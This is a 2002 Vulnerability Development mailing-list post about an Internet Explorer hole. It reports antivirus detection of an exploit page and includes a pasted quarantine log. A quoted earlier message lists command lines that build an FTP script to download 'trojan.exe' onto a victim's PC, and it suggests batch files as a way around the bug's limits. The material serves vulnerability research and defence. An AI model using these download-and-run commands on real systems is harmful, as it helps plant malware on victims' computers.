Vulnerability Development mailing list archives

Re: [Re: Rather large MSIE-hole] another variant


From: Felipe Franciosi <franciozzy () terra com br>
Date: Sat, 16 Mar 2002 01:01:52 -0300

FYI - Norton AV now picks this up.


Scan type:  Realtime Protection Scan
Event:  Virus Found!
Virus name: XMLid.Exploit
File:  C:\XXXXX\Local Settings\Temporary Internet Files\Content.IE5\C9IVKTMJ\simplebind[1].htm
Location:  Quarantine
Computer:  XXXXXX
User:  XXXXXX
Action taken:  Clean failed : Quarantine succeeded : Access denied
Date found: Fri Mar 15 19:46:32 2002

madness.

My PC CILLIN 2000 also detected the malformed "jpg" files in my
temporary folder...

Just as your Norton, it placed the files under quarantine. The
bad news is that the "malicious web code" scanner is not looking
for these "jpg" files in real time (when you are browsing the
web).

Regards,
Felipe

.........

While trying to execute something like:
"c:/command.com /c echo bin > test",
"c:/command.com /c echo GET trojan.exe >> test",
"c:/windows/ftp.exe ...."

I came up with something interesting:

This bug will NOT execute '.com' files. Maybe it's worth trying
to execute '.bat' files before attempting to place batch files
on the victim's computer in order to pass parameters.

I found this out by discovering that it will not execute
"c:/command.com", so if I'm wrong on my statement, please
forgive me... I'm very tired and I'm going to bed now. No more
tests for today.

my $.02...

Regards,
Felipe

